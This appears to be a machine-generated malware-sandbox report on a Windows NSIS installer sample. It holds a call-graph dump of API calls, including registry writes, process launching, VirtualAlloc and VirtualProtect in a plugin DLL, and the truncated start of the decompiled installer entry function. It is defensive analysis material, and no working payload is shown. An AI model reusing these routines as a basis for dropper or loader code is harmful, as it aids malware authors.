6225 4045e6 KiUserCallbackDispatcher 6201->6225 6206 4045c4 18 API calls 6202->6206 6214 4049e4 6203->6214 6209 4049d2 6204->6209 6210 4049c2 SendMessageW 6204->6210 6212 40480f CheckDlgButton 6206->6212 6226 404a32 6207->6226 6209->6214 6215 4049d8 SendMessageW 6209->6215 6210->6209 6211 40491a 6216 404a0e SendMessageW 6211->6216 6223 4045e6 KiUserCallbackDispatcher 6212->6223 6215->6214 6216->6194 6218 40482d GetDlgItem 6224 4045f9 SendMessageW 6218->6224 6220 404843 SendMessageW 6221 404860 GetSysColor 6220->6221 6222 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 6220->6222 6221->6222 6222->6214 6223->6218 6224->6220 6225->6211 6229 405c8e ShellExecuteExW 6226->6229 6228 404998 LoadCursorW SetCursor 6228->6200 6229->6228 6230 402383 6231 40238a 6230->6231 6234 40239d 6230->6234 6232 4066a5 17 API calls 6231->6232 6233 402397 6232->6233 6233->6234 6235 405cc8 MessageBoxIndirectW 6233->6235 6235->6234 5613 402c05 SendMessageW 5614 402c2a 5613->5614 5615 402c1f InvalidateRect 5613->5615 5615->5614 5071 405809 5072 4059b3 5071->5072 5073 40582a GetDlgItem GetDlgItem GetDlgItem 5071->5073 5075 4059e4 5072->5075 5076 4059bc GetDlgItem CreateThread CloseHandle 5072->5076 5117 4045f9 SendMessageW 5073->5117 5078 405a0f 5075->5078 5079 405a34 5075->5079 5080 4059fb ShowWindow ShowWindow 5075->5080 5076->5075 5120 40579d 5 API calls 5076->5120 5077 40589a 5083 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5077->5083 5081 405a1b 5078->5081 5082 405a6f 5078->5082 5087 40462b 8 API calls 5079->5087 5119 4045f9 SendMessageW 5080->5119 5085 405a23 5081->5085 5086 405a49 ShowWindow 5081->5086 5082->5079 5093 405a7d SendMessageW 5082->5093 5091 4058f3 SendMessageW SendMessageW 5083->5091 5092 40590f 5083->5092 5094 40459d SendMessageW 5085->5094 5089 405a69 5086->5089 5090 405a5b 5086->5090 5088 405a42 5087->5088 5096 40459d SendMessageW 5089->5096 5095 4056ca 24 API calls 5090->5095 5091->5092 5097 405922 5092->5097 5098 405914 SendMessageW 5092->5098 5093->5088 5099 405a96 CreatePopupMenu 5093->5099 5094->5079 5095->5089 5096->5082 5101 4045c4 18 API calls 5097->5101 5098->5097 5100 4066a5 17 API calls 5099->5100 5102 405aa6 AppendMenuW 5100->5102 5103 405932 5101->5103 5104 405ac3 GetWindowRect 5102->5104 5105 405ad6 TrackPopupMenu 5102->5105 5106 40593b ShowWindow 5103->5106 5107 40596f GetDlgItem SendMessageW 5103->5107 5104->5105 5105->5088 5109 405af1 5105->5109 5110 405951 ShowWindow 5106->5110 5111 40595e 5106->5111 5107->5088 5108 405996 SendMessageW SendMessageW 5107->5108 5108->5088 5112 405b0d SendMessageW 5109->5112 5110->5111 5118 4045f9 SendMessageW 5111->5118 5112->5112 5113 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5112->5113 5115 405b4f SendMessageW 5113->5115 5115->5115 5116 405b78 GlobalUnlock SetClipboardData CloseClipboard 5115->5116 5116->5088 5117->5077 5118->5107 5119->5078 5282 40248a 5283 402da6 17 API calls 5282->5283 5284 40249c 5283->5284 5285 402da6 17 API calls 5284->5285 5286 4024a6 5285->5286 5299 402e36 5286->5299 5289 402c2a 5290 4024de 5292 4024ea 5290->5292 5303 402d84 5290->5303 5291 402da6 17 API calls 5293 4024d4 lstrlenW 5291->5293 5295 402509 RegSetValueExW 5292->5295 5297 403371 44 API calls 5292->5297 5293->5290 5296 40251f RegCloseKey 5295->5296 5296->5289 5297->5295 5300 402e51 5299->5300 5306 406503 5300->5306 5304 4066a5 17 API calls 5303->5304 5305 402d99 5304->5305 5305->5292 5307 406512 5306->5307 5308 4024b6 5307->5308 5309 40651d RegCreateKeyExW 5307->5309 5308->5289 5308->5290 5308->5291 5309->5308 5616 404e0b 5617 404e37 5616->5617 5618 404e1b 5616->5618 5620 404e6a 5617->5620 5621 404e3d SHGetPathFromIDListW 5617->5621 5627 405cac GetDlgItemTextW 5618->5627 5623 404e4d 5621->5623 5626 404e54 SendMessageW 5621->5626 5622 404e28 SendMessageW 5622->5617 5625 40140b 2 API calls 5623->5625 5625->5626 5626->5620 5627->5622 6081 40290b 6082 402da6 17 API calls 6081->6082 6083 402912 FindFirstFileW 6082->6083 6084 402925 6083->6084 6085 40293a 6083->6085 6086 402943 6085->6086 6089 4065af wsprintfW 6085->6089 6090 406668 lstrcpynW 6086->6090 6089->6086 6090->6084 6091 40190c 6092 401943 6091->6092 6093 402da6 17 API calls 6092->6093 6094 401948 6093->6094 6095 405d74 67 API calls 6094->6095 6096 401951 6095->6096 6097 40190f 6098 402da6 17 API calls 6097->6098 6099 401916 6098->6099 6100 405cc8 MessageBoxIndirectW 6099->6100 6101 40191f 6100->6101 5392 402891 5393 402898 5392->5393 5394 402ba9 5392->5394 5395 402d84 17 API calls 5393->5395 5396 40289f 5395->5396 5397 4028ae SetFilePointer 5396->5397 5397->5394 5398 4028be 5397->5398 5400 4065af wsprintfW 5398->5400 5400->5394 5855 401491 5856 4056ca 24 API calls 5855->5856 5857 401498 5856->5857 6102 401f12 6103 402da6 17 API calls 6102->6103 6104 401f18 6103->6104 6105 402da6 17 API calls 6104->6105 6106 401f21 6105->6106 6107 402da6 17 API calls 6106->6107 6108 401f2a 6107->6108 6109 402da6 17 API calls 6108->6109 6110 401f33 6109->6110 6111 401423 24 API calls 6110->6111 6112 401f3a 6111->6112 6119 405c8e ShellExecuteExW 6112->6119 6114 401f82 6115 406ae0 5 API calls 6114->6115 6116 40292e 6114->6116 6117 401f9f CloseHandle 6115->6117 6117->6116 6119->6114 6236 402f93 6237 402fa5 SetTimer 6236->6237 6238 402fbe 6236->6238 6237->6238 6239 40300c 6238->6239 6240 403012 MulDiv 6238->6240 6241 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 6240->6241 6241->6239 6243 407194 6247 406be3 6243->6247 6244 40754e 6245 406c64 GlobalFree 6246 406c6d GlobalAlloc 6245->6246 6246->6244 6246->6247 6247->6244 6247->6245 6247->6246 6247->6247 6248 406ce4 GlobalAlloc 6247->6248 6249 406cdb GlobalFree 6247->6249 6248->6244 6248->6247 6249->6248 6250 6f1310c7 6251 6f1310f8 6250->6251 6252 6f1312be GlobalFree 6251->6252 6253 6f131258 GlobalFree 6251->6253 6254 6f1311d7 GlobalAlloc 6251->6254 6255 6f1312ba 6251->6255 6256 6f131548 3 API calls 6251->6256 6257 6f131296 GlobalFree 6251->6257 6258 6f1315eb 2 API calls 6251->6258 6259 6f131638 lstrcpyW 6251->6259 6261 6f131165 GlobalAlloc 6251->6261 6253->6251 6254->6251 6255->6252 6256->6251 6257->6251 6260 6f1311ca GlobalFree 6258->6260 6262 6f1311ab GlobalFree 6259->6262 6260->6251 6261->6251 6262->6251 6263 6f131cc7 6264 6f131cee 6263->6264 6265 6f131d2f GlobalFree 6264->6265 6266 6f131d4e 6264->6266 6265->6266 6267 6f1315eb 2 API calls 6266->6267 6268 6f131de5 GlobalFree GlobalFree 6267->6268 6269 6f1312c6 6270 6f13101b 5 API calls 6269->6270 6271 6f1312df 6270->6271 6120 401d17 6121 402d84 17 API calls 6120->6121 6122 401d1d IsWindow 6121->6122 6123 401a20 6122->6123 5444 6f131a4a 5445 6f131aa1 5444->5445 5446 6f131a5a VirtualProtect 5444->5446 5446->5445 5447 401b9b 5448 401ba8 5447->5448 5449 401bec 5447->5449 5450 401c31 5448->5450 5456 401bbf 5448->5456 5451 401bf1 5449->5451 5452 401c16 GlobalAlloc 5449->5452 5453 4066a5 17 API calls 5450->5453 5461 40239d 5450->5461 5451->5461 5468 406668 lstrcpynW 5451->5468 5454 4066a5 17 API calls 5452->5454 5455 402397 5453->5455 5454->5450 5455->5461 5462 405cc8 MessageBoxIndirectW 5455->5462 5466 406668 lstrcpynW 5456->5466 5459 401c03 GlobalFree 5459->5461 5460 401bce 5467 406668 lstrcpynW 5460->5467 5462->5461 5464 401bdd 5469 406668 lstrcpynW 5464->5469 5466->5460 5467->5464 5468->5459 5469->5461 5628 40261c 5629 402da6 17 API calls 5628->5629 5630 402623 5629->5630 5633 406158 GetFileAttributesW CreateFileW 5630->5633 5632 40262f 5633->5632 5476 40259e 5477 402de6 17 API calls 5476->5477 5478 4025a8 5477->5478 5479 402d84 17 API calls 5478->5479 5480 4025b1 5479->5480 5481 4025d9 RegEnumValueW 5480->5481 5482 4025cd RegEnumKeyW 5480->5482 5485 40292e 5480->5485 5483 4025f5 RegCloseKey 5481->5483 5484 4025ee 5481->5484 5482->5483 5483->5485 5484->5483 5858 40149e 5859 4014ac PostQuitMessage 5858->5859 5860 40239d 5858->5860 5859->5860 4950 4015a3 4951 402da6 17 API calls 4950->4951 4952 4015aa SetFileAttributesW 4951->4952 4953 4015bc 4952->4953 4954 401fa4 4955 402da6 17 API calls 4954->4955 4956 401faa 4955->4956 4957 4056ca 24 API calls 4956->4957 4958 401fb4 4957->4958 4959 405c4b 2 API calls 4958->4959 4960 401fba 4959->4960 4961 401fdd CloseHandle 4960->4961 4962 40292e 4960->4962 4969 406ae0 WaitForSingleObject 4960->4969 4961->4962 4965 401fcf 4966 401fd4 4965->4966 4967 401fdf 4965->4967 4974 4065af wsprintfW 4966->4974 4967->4961 4970 406afa 4969->4970 4971 406b0c GetExitCodeProcess 4970->4971 4972 406a71 2 API calls 4970->4972 4971->4965 4973 406b01 WaitForSingleObject 4972->4973 4973->4970 4974->4961 5121 6f13167a 5122 6f1316b7 5121->5122 5163 6f132351 5122->5163 5124 6f1316be 5125 6f1317ef 5124->5125 5126 6f1316d6 5124->5126 5127 6f1316cf 5124->5127 5193 6f132049 5126->5193 5209 6f131fcb 5127->5209 5132 6f131722 5222 6f132209 5132->5222 5133 6f131740 5138 6f131791 5133->5138 5139 6f131746 5133->5139 5134 6f1316eb 5137 6f1316f5 5134->5137 5143 6f131702 5134->5143 5135 6f13170a 5148 6f131700 5135->5148 5219 6f132f9f 5135->5219 5137->5148 5203 6f132d14 5137->5203 5141 6f132209 10 API calls 5138->5141 5242 6f131f1e 5139->5242 5146 6f13177e 5141->5146 5142 6f131728 5234 6f131668 5142->5234 5213 6f1317f7 5143->5213 5162 6f1317de 5146->5162 5247 6f13200d 5146->5247 5148->5132 5148->5133 5152 6f131708 5152->5148 5153 6f132209 10 API calls 5153->5146 5155 6f1317e8 GlobalFree 5155->5125 5159 6f1317cf 5159->5162 5251 6f1315c5 wsprintfW 5159->5251 5160 6f1317c2 FreeLibrary 5160->5159 5162->5125 5162->5155 5254 6f1312f8 GlobalAlloc 5163->5254 5165 6f13237f 5255 6f1312f8 GlobalAlloc 5165->5255 5167 6f132a3a GlobalFree GlobalFree GlobalFree 5168 6f132a5a 5167->5168 5182 6f132aa7 5167->5182 5169 6f132af7 5168->5169 5174 6f132a73 5168->5174 5168->5182 5171 6f132b19 GetModuleHandleW 5169->5171 5169->5182 5170 6f132947 GlobalAlloc 5188 6f13238a 5170->5188 5172 6f132b2a LoadLibraryW 5171->5172 5173 6f132b3f 5171->5173 5172->5173 5172->5182 5262 6f131f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5173->5262 5179 6f1312e1 2 API calls 5174->5179 5174->5182 5176 6f13299f lstrcpyW 5176->5188 5177 6f1329bd GlobalFree 5177->5188 5178 6f132b8e 5181 6f132b9c lstrlenW 5178->5181 5178->5182 5179->5182 5180 6f1329af lstrcpyW 5180->5188 5263 6f131f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5181->5263 5182->5124 5183 6f132b4c 5183->5178 5191 6f132b78 GetProcAddress 5183->5191 5185 6f132bb6 5185->5182 5187 6f132822 GlobalFree 5187->5188 5188->5167 5188->5170 5188->5176 5188->5177 5188->5180 5188->5187 5190 6f1329fb 5188->5190 5256 6f1312f8 GlobalAlloc 5188->5256 5257 6f1312e1 5188->5257 5190->5188 5260 6f131309 GlobalSize GlobalAlloc 5190->5260 5191->5178 5198 6f13205e 5193->5198 5195 6f132124 GlobalAlloc WideCharToMultiByte 5197 6f1321be GlobalFree 5195->5197 5196 6f132154 GlobalAlloc CLSIDFromString 5196->5198 5197->5198 5199 6f1316dc 5197->5199 5198->5195 5198->5196 5198->5197 5200 6f1312e1 lstrcpynW GlobalAlloc 5198->5200 5202 6f132179 5198->5202 5265 6f131548 5198->5265 5199->5134 5199->5135 5199->5148 5200->5198 5202->5197 5270 6f1319db 5202->5270 5205 6f132d26 5203->5205 5204 6f132dcb VirtualAlloc 5208 6f132de9 5204->5208 5205->5204 5273 6f132cbf 5208->5273 5210 6f131fde 5209->5210 5211 6f131fe9 GlobalAlloc 5210->5211 5212 6f1316d5 5210->5212 5211->5210 5212->5126 5217 6f131823 5213->5217 5214 6f131897 GlobalAlloc 5218 6f1318b5 5214->5218 5215 6f1318a8 5216 6f1318ac GlobalSize 5215->5216 5215->5218 5216->5218 5217->5214 5217->5215 5218->5152 5220 6f132faa 5219->5220 5221 6f132fea GlobalFree 5220->5221 5276 6f1312f8 GlobalAlloc 5222->5276 5224 6f132211 5225 6f132280 MultiByteToWideChar 5224->5225 5226 6f1322b7 lstrcpynW 5224->5226 5227 6f1322a6 StringFromGUID2 5224->5227 5228 6f1322ca wsprintfW 5224->5228 5229 6f1322ee GlobalFree 5224->5229 5230 6f132325 GlobalFree 5224->5230 5231 6f132303 5224->5231 5277 6f131638 5224->5277 5225->5224 5226->5224 5227->5224 5228->5224 5229->5224 5230->5142 5231->5224 5232 6f1315eb 2 API calls 5231->5232 5232->5231 5281 6f1312f8 GlobalAlloc 5234->5281 5236 6f13166d 5237 6f131f1e 2 API calls 5236->5237 5238 6f131677 5237->5238 5239 6f1315eb 5238->5239 5240 6f131633 GlobalFree 5239->5240 5241 6f1315f4 GlobalAlloc lstrcpynW 5239->5241 5240->5146 5241->5240 5243 6f131f2b wsprintfW 5242->5243 5244 6f131f5c lstrcpyW 5242->5244 5246 6f131765 5243->5246 5244->5246 5246->5153 5248 6f1317a4 5247->5248 5249 6f13201c 5247->5249 5248->5159 5248->5160 5249->5248 5250 6f132033 GlobalFree 5249->5250 5250->5249 5252 6f1315eb 2 API calls 5251->5252 5253 6f1315e6 5252->5253 5253->5162 5254->5165 5255->5188 5256->5188 5264 6f1312f8 GlobalAlloc 5257->5264 5259 6f1312f0 lstrcpynW 5259->5188 5261 6f131327 5260->5261 5261->5190 5262->5183 5263->5185 5264->5259 5266 6f131555 5265->5266 5267 6f1312f8 GlobalAlloc 5265->5267 5268 6f1312e1 2 API calls 5266->5268 5267->5198 5269 6f13156a 5268->5269 5269->5198 5271 6f1319ea VirtualAlloc 5270->5271 5272 6f131a48 5270->5272 5271->5272 5272->5202 5274 6f132cd8 5273->5274 5275 6f132ccd GetLastError 5273->5275 5274->5148 5275->5274 5276->5224 5278 6f131663 5277->5278 5279 6f13163f 5277->5279 5278->5224 5279->5278 5280 6f131648 lstrcpyW 5279->5280 5280->5278 5281->5236 5310 40252a 5321 402de6 5310->5321 5313 402da6 17 API calls 5314 40253d 5313->5314 5315 402548 RegQueryValueExW 5314->5315 5320 40292e 5314->5320 5316 40256e RegCloseKey 5315->5316 5317 402568 5315->5317 5316->5320 5317->5316 5326 4065af wsprintfW 5317->5326 5322 402da6 17 API calls 5321->5322 5323 402dfd 5322->5323 5324 4064d5 RegOpenKeyExW 5323->5324 5325 402534 5324->5325 5325->5313 5326->5316 5634 40202a 5635 402da6 17 API calls 5634->5635 5636 402031 5635->5636 5637 406a35 5 API calls 5636->5637 5638 402040 5637->5638 5639 40205c GlobalAlloc 5638->5639 5648 4020cc 5638->5648 5640 402070 5639->5640 5639->5648 5641 406a35 5 API calls 5640->5641 5642 402077 5641->5642 5643 406a35 5 API calls 5642->5643 5644 402081 5643->5644 5644->5648 5649 4065af wsprintfW 5644->5649 5646 4020ba 5650 4065af wsprintfW 5646->5650 5649->5646 5650->5648 6279 4021aa 6280 402da6 17 API calls 6279->6280 6281 4021b1 6280->6281 6282 402da6 17 API calls 6281->6282 6283 4021bb 6282->6283 6284 402da6 17 API calls 6283->6284 6285 4021c5 6284->6285 6286 402da6 17 API calls 6285->6286 6287 4021cf 6286->6287 6288 402da6 17 API calls 6287->6288 6289 4021d9 6288->6289 6290 402218 CoCreateInstance 6289->6290 6291 402da6 17 API calls 6289->6291 6293 402237 6290->6293 6291->6290 6292 401423 24 API calls 6294 4022f6 6292->6294 6293->6292 6293->6294 5651 401a30 5652 402da6 17 API calls 5651->5652 5653 401a39 ExpandEnvironmentStringsW 5652->5653 5654 401a4d 5653->5654 5656 401a60 5653->5656 5655 401a52 lstrcmpW 5654->5655 5654->5656 5655->5656 5657 405031 GetDlgItem GetDlgItem 5658 405083 7 API calls 5657->5658 5664 4052a8 5657->5664 5659 40512a DeleteObject 5658->5659 5660 40511d SendMessageW 5658->5660 5661 405133 5659->5661 5660->5659 5662 40516a 5661->5662 5665 4066a5 17 API calls 5661->5665 5666 4045c4 18 API calls 5662->5666 5663 40538a 5667 405436 5663->5667 5672 40529b 5663->5672 5677 4053e3 SendMessageW 5663->5677 5664->5663 5691 405317 5664->5691 5711 404f7f SendMessageW 5664->5711 5670 40514c SendMessageW SendMessageW 5665->5670 5671 40517e 5666->5671 5668 405440 SendMessageW 5667->5668 5669 405448 5667->5669 5668->5669 5679 405461 5669->5679 5680 40545a ImageList_Destroy 5669->5680 5688 405471 5669->5688 5670->5661 5676 4045c4 18 API calls 5671->5676 5674 40462b 8 API calls 5672->5674 5673 40537c SendMessageW 5673->5663 5678 405637 5674->5678 5692 40518f 5676->5692 5677->5672 5682 4053f8 SendMessageW 5677->5682 5683 40546a GlobalFree 5679->5683 5679->5688 5680->5679 5681 4055eb 5681->5672 5686 4055fd ShowWindow GetDlgItem ShowWindow 5681->5686 5685 40540b 5682->5685 5683->5688 5684 40526a GetWindowLongW SetWindowLongW 5687 405283 5684->5687 5697 40541c SendMessageW 5685->5697 5686->5672 5689 4052a0 5687->5689 5690 405288 ShowWindow 5687->5690 5688->5681 5704 4054ac 5688->5704 5716 404fff 5688->5716 5710 4045f9 SendMessageW 5689->5710 5709 4045f9 SendMessageW 5690->5709 5691->5663 5691->5673 5692->5684 5693 405265 5692->5693 5696 4051e2 SendMessageW 5692->5696 5698 405220 SendMessageW 5692->5698 5699 405234 SendMessageW 5692->5699 5693->5684 5693->5687 5696->5692 5697->5667 5698->5692 5699->5692 5701 4055b6 5702 4055c1 InvalidateRect 5701->5702 5706 4055cd 5701->5706 5702->5706 5703 4054da SendMessageW 5705 4054f0 5703->5705 5704->5703 5704->5705 5705->5701 5707 405564 SendMessageW SendMessageW 5705->5707 5706->5681 5725 404f3a 5706->5725 5707->5705 5709->5672 5710->5664 5712 404fa2 GetMessagePos ScreenToClient SendMessageW 5711->5712 5713 404fde SendMessageW 5711->5713 5714 404fd6 5712->5714 5715 404fdb 5712->5715 5713->5714 5714->5691 5715->5713 5728 406668 lstrcpynW 5716->5728 5718 405012 5729 4065af wsprintfW 5718->5729 5720 40501c 5721 40140b 2 API calls 5720->5721 5722 405025 5721->5722 5730 406668 lstrcpynW 5722->5730 5724 40502c 5724->5704 5731 404e71 5725->5731 5727 404f4f 5727->5681 5728->5718 5729->5720 5730->5724 5732 404e8a 5731->5732 5733 4066a5 17 API calls 5732->5733 5734 404eee 5733->5734 5735 4066a5 17 API calls 5734->5735 5736 404ef9 5735->5736 5737 4066a5 17 API calls 5736->5737 5738 404f0f lstrlenW wsprintfW SetDlgItemTextW 5737->5738 5738->5727 5401 4023b2 5402 4023c0 5401->5402 5403 4023ba 5401->5403 5405 4023ce 5402->5405 5407 402da6 17 API calls 5402->5407 5404 402da6 17 API calls 5403->5404 5404->5402 5406 4023dc 5405->5406 5408 402da6 17 API calls 5405->5408 5409 402da6 17 API calls 5406->5409 5407->5405 5408->5406 5410 4023e5 WritePrivateProfileStringW 5409->5410 5739 402434 5740 402467 5739->5740 5741 40243c 5739->5741 5743 402da6 17 API calls 5740->5743 5742 402de6 17 API calls 5741->5742 5744 402443 5742->5744 5745 40246e 5743->5745 5747 402da6 17 API calls 5744->5747 5748 40247b 5744->5748 5750 402e64 5745->5750 5749 402454 RegDeleteValueW RegCloseKey 5747->5749 5749->5748 5751 402e71 5750->5751 5752 402e78 5750->5752 5751->5748 5752->5751 5754 402ea9 5752->5754 5755 4064d5 RegOpenKeyExW 5754->5755 5756 402ed7 5755->5756 5757 402f81 5756->5757 5758 402ee7 RegEnumValueW 5756->5758 5762 402f0a 5756->5762 5757->5751 5759 402f71 RegCloseKey 5758->5759 5758->5762 5759->5757 5760 402f46 RegEnumKeyW 5761 402f4f RegCloseKey 5760->5761 5760->5762 5763 406a35 5 API calls 5761->5763 5762->5759 5762->5760 5762->5761 5764 402ea9 6 API calls 5762->5764 5765 402f5f 5763->5765 5764->5762 5765->5757 5766 402f63 RegDeleteKeyW 5765->5766 5766->5757 6131 404734 lstrlenW 6132 404753 6131->6132 6133 404755 WideCharToMultiByte 6131->6133 6132->6133 5873 404ab5 5874 404ae1 5873->5874 5875 404af2 5873->5875 5934 405cac GetDlgItemTextW 5874->5934 5876 404afe GetDlgItem 5875->5876 5883 404b5d 5875->5883 5879 404b12 5876->5879 5878 404aec 5881 4068ef 5 API calls 5878->5881 5882 404b26 SetWindowTextW 5879->5882 5886 405fe2 4 API calls 5879->5886 5880 404c41 5930 404df0 5880->5930 5936 405cac GetDlgItemTextW 5880->5936 5881->5875 5887 4045c4 18 API calls 5882->5887 5883->5880 5888 4066a5 17 API calls 5883->5888 5883->5930 5885 40462b 8 API calls 5890 404e04 5885->5890 5891 404b1c 5886->5891 5892 404b42 5887->5892 5893 404bd1 SHBrowseForFolderW 5888->5893 5889 404c71 5894 40603f 18 API calls 5889->5894 5891->5882 5898 405f37 3 API calls 5891->5898 5895 4045c4 18 API calls 5892->5895 5893->5880 5896 404be9 CoTaskMemFree 5893->5896 5897 404c77 5894->5897 5899 404b50 5895->5899 5900 405f37 3 API calls 5896->5900 5937 406668 lstrcpynW 5897->5937 5898->5882 5935 4045f9 SendMessageW 5899->5935 5902 404bf6 5900->5902 5905 404c2d SetDlgItemTextW 5902->5905 5909 4066a5 17 API calls 5902->5909 5904 404b56 5907 406a35 5 API calls 5904->5907 5905->5880 5906 404c8e 5908 406a35 5 API calls 5906->5908 5907->5883 5916 404c95 5908->5916 5910 404c15 lstrcmpiW 5909->5910 5910->5905 5912 404c26 lstrcatW 5910->5912 5911 404cd6 5938 406668 lstrcpynW 5911->5938 5912->5905 5914 404cdd 5915 405fe2 4 API calls 5914->5915 5917 404ce3 GetDiskFreeSpaceW 5915->5917 5916->5911 5920 405f83 2 API calls 5916->5920 5921 404d2e 5916->5921 5919 404d07 MulDiv 5917->5919 5917->5921 5919->5921 5920->5916 5922 404f3a 20 API calls 5921->5922 5932 404d9f 5921->5932 5924 404d8c 5922->5924 5923 404dc2 5939 4045e6 KiUserCallbackDispatcher 5923->5939 5926 404da1 SetDlgItemTextW 5924->5926 5927 404d91 5924->5927 5925 40140b 2 API calls 5925->5923 5926->5932 5929 404e71 20 API calls 5927->5929 5929->5932 5930->5885 5931 404dde 5931->5930 5940 404a0e 5931->5940 5932->5923 5932->5925 5934->5878 5935->5904 5936->5889 5937->5906 5938->5914 5939->5931 5941 404a21 SendMessageW 5940->5941 5942 404a1c 5940->5942 5941->5930 5942->5941 6134 401735 6135 402da6 17 API calls 6134->6135 6136 40173c SearchPathW 6135->6136 6137 401757 6136->6137 5943 4014b8 5944 4014be 5943->5944 5945 401389 2 API calls 5944->5945 5946 4014c6 5945->5946 6138 401d38 6139 402d84 17 API calls 6138->6139 6140 401d3f 6139->6140 6141 402d84 17 API calls 6140->6141 6142 401d4b GetDlgItem 6141->6142 6143 402638 6142->6143 6144 6f132c6a 6145 6f132cc3 6144->6145 6146 6f132cd8 6144->6146 6145->6146 6147 6f132ccd GetLastError 6145->6147 6147->6146 5767 40563e 5768 405662 5767->5768 5769 40564e 5767->5769 5772 40566a IsWindowVisible 5768->5772 5778 405681 5768->5778 5770 405654 5769->5770 5771 4056ab 5769->5771 5774 404610 SendMessageW 5770->5774 5773 4056b0 CallWindowProcW 5771->5773 5772->5771 5775 405677 5772->5775 5776 40565e 5773->5776 5774->5776 5777 404f7f 5 API calls 5775->5777 5777->5778 5778->5773 5779 404fff 4 API calls 5778->5779 5779->5771 5780 40263e 5781 402652 5780->5781 5782 40266d 5780->5782 5783 402d84 17 API calls 5781->5783 5784 402672 5782->5784 5785 40269d 5782->5785 5794 402659 5783->5794 5786 402da6 17 API calls 5784->5786 5787 402da6 17 API calls 5785->5787 5789 402679 5786->5789 5788 4026a4 lstrlenW 5787->5788 5788->5794 5797 40668a WideCharToMultiByte 5789->5797 5791 40268d lstrlenA 5791->5794 5792 4026d1 5793 4026e7 5792->5793 5795 40620a WriteFile 5792->5795 5794->5792 5794->5793 5796 406239 5 API calls 5794->5796 5795->5793 5796->5792 5797->5791

                                                                                              Executed Functions

                                                                                              Function 00403640 Relevance: 79.2, APIs: 33, Strings: 12, Instructions: 450stringfilecomCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 44 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->44 45 40397d-403995 DeleteFileW call 4030d0 37->45 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 60 4038e9-4038ea 41->60 47 403827-40382e 42->47 48 40383f-403878 42->48 44->45 64 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 44->64 66 40399b-4039a1 45->66 67 403b6c-403b7a call 403c25 OleUninitialize 45->67 52 403830-403833 47->52 53 403835 47->53 54 403894-4038ce 48->54 55 40387a-40387f 48->55 52->48 52->53 53->48 57 4038d0-4038d4 54->57 58 4038d6-4038d8 54->58 55->54 61 403881-403889 55->61 57->58 65 4038f9-403906 call 406668 57->65 58->41 60->32 62 403890 61->62 63 40388b-40388e 61->63 62->54 63->54 63->62 64->45 64->67 65->37 70 4039a7-4039ba call 405f64 66->70 71 403a48-403a4f call 403d17 66->71 77 403b91-403b97 67->77 78 403b7c-403b8b call 405cc8 ExitProcess 67->78 84 403a0c-403a19 70->84 85 4039bc-4039f1 70->85 80 403a54-403a57 71->80 82 403b99-403bae GetCurrentProcess OpenProcessToken 77->82 83 403c0f-403c17 77->83 80->67 91 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 82->91 92 403bdf-403bed call 406a35 82->92 86 403c19 83->86 87 403c1c-403c1f ExitProcess 83->87 88 403a1b-403a29 call 40603f 84->88 89 403a5c-403a70 call 405c33 lstrcatW 84->89 93 4039f3-4039f7 85->93 86->87 88->67 105 403a2f-403a45 call 406668 * 2 88->105 103 403a72-403a78 lstrcatW 89->103 104 403a7d-403a97 lstrcatW lstrcmpiW 89->104 91->92 106 403bfb-403c06 ExitWindowsEx 92->106 107 403bef-403bf9 92->107 97 403a00-403a08 93->97 98 4039f9-4039fe 93->98 97->93 100 403a0a 97->100 98->97 98->100 100->84 103->104 108 403b6a 104->108 109 403a9d-403aa0 104->109 105->71 106->83 111 403c08-403c0a call 40140b 106->111 107->106 107->111 108->67 113 403aa2-403aa7 call 405b99 109->113 114 403aa9 call 405c16 109->114 111->83 121 403aae-403abe SetCurrentDirectoryW 113->121 114->121 123 403ac0-403ac6 call 406668 121->123 124 403acb-403af7 call 406668 121->124 123->124 128 403afc-403b17 call 4066a5 DeleteFileW 124->128 131 403b57-403b61 128->131 132 403b19-403b29 CopyFileW 128->132 131->128 134 403b63-403b65 call 406428 131->134 132->131 133 403b2b-403b4b call 406428 call 4066a5 call 405c4b 132->133 133->131 142 403b4d-403b54 CloseHandle 133->142 134->108 142->131
                                                                                              C-Code - Quality: 77%
                                                                                              			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				intOrPtr* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				int* _t219;
				signed int _t227;
				signed int _t230;
